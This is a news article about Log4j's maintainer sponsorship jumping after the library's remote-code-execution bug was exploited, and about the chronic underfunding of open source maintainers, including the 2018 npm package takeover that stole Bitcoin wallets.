Log4j's project sponsorship skyrockets after critical bug exploitation

The maintainers of the Java Log4j project had only three sponsors, despite the software being a crucial part of large companies' commercial products and enterprise applications.

Roger Goers, the intial Log4j coder and member of the Apache Software Foundation now has 58 mostly individual sponsors at the time of publishing.

Log4j is a popular logging library for Java which, due to insecure handling of directory lookups, allows the remote execution of arbitrary code in its default configuration.

Poor funding is an ongoing problem with free open source software (FOSS), with developers expected to commit to years of unpaid work of ever-increasing complexity, a situation that they say is unsustainable.

Christine Dodrill, a WebAssembly developer working on portable binary code programs that can run on web pages, said the situation is so bad that she is very careful how she codes software and releases it to the world.

"No offense, but I really do not want to go unpaid for my efforts," Dodrill wrote.

"The existing leech culture of open source being a pool of free labour makes it hard for me to want to have my side projects be actually useful like that unless you pay me."

Others such as Java luminary Mark Derricutt agree, and say organisations should change their mindsets, and consider funded and not free open source software.

"I'd say the... funding for a lot of open source [projects] is woefully low," Derricutt said.

Google Go developer and cryptographer Filippo Valsorda pointed out that the work of open source project maintainers is complex and demanding, and that it's not fair to demand it be done without payment.

Valsorda estimated that many developers of popular open source projects would be paid salaries in the US$350,000 range working as senior software developers.

Currently, many open source developers receive funding through donations, but this is not a good long-term solution, Valsorda said, though neither is being employed as a full-time maintainer at a big company, where a developer may end up spending more and more time proving the work they do is important rather than just doing it.

Instead, Valsorda suggests maintainers should become professionalised, sending big companies suitably large invoices for their work as this is a model that enterprises understand, unlike donation-based funding.

Many developers are unable to continue their work maintaining and updating the software they've written, which could lead to security issues that might not get fixed in a timely fashion.

In 2018, a Javascript module developer gave up on an npm package as it was no fun to work on for free, and handed it off to to an unknown person.

The unknown person who took over as a project maintainer added malicious code to the npm package that stole users'  Bitcoin wallets.

At the time, Dominic Tarr, who originally developed the npm package, told iTnews the open source model was broken and that maintainers needed to get paid for their work.

"When millions of people depend on something that the original author has very little motivation to maintain, that's insane," Tarr said.